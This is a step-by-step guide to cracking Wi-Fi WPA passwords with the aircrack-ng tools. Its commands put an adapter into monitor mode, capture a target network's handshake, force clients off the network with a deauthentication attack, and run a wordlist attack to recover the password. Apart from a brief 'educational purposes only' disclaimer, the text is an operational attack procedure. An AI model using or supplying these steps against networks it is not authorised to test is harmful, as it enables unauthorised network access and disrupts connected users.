Wi-Fi Password Cracking

TL;DR

This guide explains how to attempt cracking a Wi-FI password using brute-force methods. Warning: Attempting to crack passwords without permission is illegal and unethical. This information is for educational purposes only, specifically to understand cyber security vulnerabilities and improve your own network protection.

Prerequisites

• A Linux distribution (Kali Linux is recommended).
• A wireless adapter that supports monitor mode and packet injection.
• Basic command-line knowledge.

Step 1: Put Your Wireless Adapter into Monitor Mode

Monitor mode allows your wireless adapter to capture all Wi-FI traffic, not just the packets addressed to it.

1. Identify your wireless interface name (e.g., wlan0). Use

   iwconfig

   .

2. Stop any processes that might interfere with the adapter:

   sudo airmon-ng check kill

   .

3. Start monitor mode:

   sudo airmon-ng start wlan0

   (replace ‘wlan0’ with your interface name). This will usually create a new interface like wlan0mon.

Step 2: Capture Wi-FI Traffic

You need to capture the handshake between a client device and the access point.

1. Use

   airodump-ng wlan0mon

   (replace ‘wlan0mon’ with your monitor mode interface). This will display a list of nearby Wi-FI networks.

2. Identify the target network’s BSSID and channel number.
3. Run

   airodump-ng -c [channel] --bssid [BSSID] -w [output_file] wlan0mon

   . Replace ‘[channel]’ with the target’s channel, ‘[BSSID]’ with its MAC address, and ‘[output_file]’ with a filename (e.g., capture). This will save captured packets to files named ‘capture-01.cap’, etc.

4. To speed up the handshake capture, deauthenticate a connected client:

   sudo aireplay-ng -0 1 -a [BSSID] -c [client_MAC] wlan0mon

   . Replace ‘[client_MAC]’ with the MAC address of a connected device. You only need to do this once or twice; look for ‘WPA handshake’ in the airodump-ng output.

Step 3: Crack the Password

Now you’ll use a wordlist and a cracking tool to attempt to find the password.

1. Download a wordlist (e.g., rockyou.txt). These are large files; ensure you have enough storage space.
2. Use Aircrack-ng to crack the handshake:

   aircrack-ng -w [wordlist_path] [capture_file].cap

   . Replace ‘[wordlist_path]’ with the path to your wordlist and ‘[capture_file].cap’ with the name of your capture file.

3. Aircrack-ng will attempt to match passwords from the wordlist against the captured handshake. If successful, it will display the password.

Important Considerations

• Wordlist Quality: The success of brute-force attacks depends heavily on the quality and size of your wordlist.
• Time: Cracking passwords can take a very long time, from minutes to years, depending on password complexity and hardware.
• Legal Implications: As stated before, cracking Wi-FI passwords without permission is illegal. This guide is for educational purposes only.